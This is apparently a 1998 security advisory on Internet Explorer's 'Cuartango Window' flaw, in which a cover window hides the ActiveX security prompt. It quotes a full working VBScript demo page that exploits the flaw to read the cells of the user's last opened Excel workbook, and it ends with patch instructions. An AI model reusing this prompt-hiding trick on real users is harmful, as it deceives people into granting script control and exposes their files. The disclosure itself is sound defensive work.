24th Dec 1998 [SBWID-1256]
COMMAND
MS IE
SYSTEMS AFFECTED
Microsoft Internet Explorer versions 3.X, 4.0, 4.01, 4.01 Service Pack 1 for Windows 95
Microsoft Internet Explorer versions 4.01 ServicePack 1 for Windows 98
Microsoft Internet Explorer versions 3.X, 4.0, 4.01, 4.01 Service Pack 1 for Windows NT 4.0
Microsoft Internet Explorer versions 3.X, 4.0, 4.01 for Windows 3.1
Microsoft Internet Explorer versions 3.X, 4.0, 4.01 for Windows NT 3.51
Microsoft Internet Explorer versions 3.X, 4.X for Macintosh
Microsoft Internet Explorer version 4 for UNIX on HPUX
Microsoft Internet Explorer version 4 for UNIX on Sun Solaris
PROBLEM
Juan Carlos G. Cuartango of Spain found following. When Microsoft
Internet Explorer detects that a Visual Basic Script included in
an HTML page will create an object ("CreateObject" sentence) your
file system a security alert dialog is displayed. Following was
taken from:
http://pages.whowhere.com/computers/cuartangojc/curartangow1.html
Nobody with a minimum knowledge about ActiveX and VB Scripts
would accept this dialog. If you click the "yes" button your have
given FULL CONTROL of your machine to the VB Script code. The
vulnerability comes from the fact that is possible to hide this
dialog box and get FULL CONTROL over the victim machine. The key
idea is very simple: just display a window over the security
alert hiding the message and replacing it by another friendly
message but keeping visible the buttons of the original message.
First we open a friendly window (The Cuartango Window):
set wcover = window.open ("welcome.htm", "Welcome ... )
Next instruction will generate the security alert because we are
accesing the file system this prompt will be behind the welcome
window!!!
Set fs = CreateObject("Object Name goes here")
At this moment instead of the alert window we see something else.
If the YES button is clicked the script has FULL CONTROL. The
welcome window in no longer needed and we close it
wcover.close
At this point we are the script owns the machine. As an example,
the demo at address above will create a MS Excel 97 Object. But
the script could do everything on your machine, delete all your
files, install a virus, etc. Affected software is IE 4 and IE
5 Preview. Demo looks like:
<html>
<head>
<meta name="description" content="Explorer vulnerability : Cuartango Window hole">
<meta name="GENERATOR" content="Microsoft FrontPage 3.0">
<meta name="keywords"
content="activex security,explorer security hole,explorer vulnerability,cuartango window,cuartango hole,cuartango hack,activex hole,vbscript hole,cuartango,security,security site,security web,hack,security,risk,hole,security hole,explorer">
<title>Cuartango Window demo</title>
</head>
<body bgcolor="#C0C0C0">
<script language="VBScript">
if instr(1,navigator.userAgent,"MSIE") = 0 then
msgbox "Please, use Microsoft Internet Explorer",0,"GoodBye"
window.navigate "http://www.microsoft.com"
end if
if window.screen.width <> 800 then
alert "Your screen resolution must be 800 x 600"
window.navigate "cuartangow1.html"
else ' coordinates given for 800 x 600
set wcover = window.open ("welcometrick.html", "Welcome", "top = 190,left = 227, height = 80, width = 335,toolbar=no, maximize=no, resizeable=no, status=no")
Set fs = CreateObject("Excel.Application")
wcover.close
fs.Workbooks.Open fs.recentfiles(1).name
' fs.cells.select
' fs.selection.copy
for i = 1 to 10
for j = 65 to 74
rng = chr(j) + cstr(i)
cellstext = cellstext + fs.range(rng).text + chr(09) '
next
cellstext = cellstext + chr(13) + chr(10)
next
fs.Quit
set fs = nothing
end if
</script>
<h1 align="center"><small><small><font color="#FF0000">Cuartango Window Demo</font></small></small></h1>
<p align="left">This example shows you how ActiveX can interact with your system. As an
example I have read your last open (only 10 first rows and columns) Excel WorkSheet.
This script is just a demo but a malicious script could do anything on your computer, read
files, delete files, read your mail ...<br>
ActiveX scripting can acces almot every appication installed on your system.</p>
<form method="POST" name="form1">
<p> <small><small><small><font face="Arial"><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><small><textarea
rows="9" name="T1" cols="132" style="font-family: Courier New; font-size: 8pt"></textarea></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></small></font></small></small></small></p>
</form>
<script language="VBScript">
document.form1.T1.value = cellstext
</script>
<p align="center">Back to <a href="cuartangow1.html">Cuartango Window Page</a></p>
</body>
</html>
SOLUTION
Windows 98
----------
Windows 98 customers can obtain the updated patch using Windows
Update. To obtain this patch using Windows Update, launch Windows
Update from the Windows Start Menu and click "Product Updates."
When prompted, select 'Yes' to allow Windows Update to determine
whether this patch and other updates are needed by your computer.
If your computer does need this patch, you will find it listed
under the "Critical Updates" section of the page.
Internet Explorer 3.X and 4.0
-----------------------------
Internet Explorer 3.X and 4.0 users must first upgrade to Internet
Explorer 4.01 with Service Pack 1, which is available at
http://www.microsoft.com/windows/ie/download/
Internet Explorer 4.01
----------------------
Customers using Internet Explorer 4.01 (with or without Service
Pack 1) can obtain the patch from the Internet Explorer Security
web site:
http://www.microsoft.com/windows/ie/security/spoof.asp
The patches for the Macintosh, HPUX and Solaris versions will be
slightly delayed.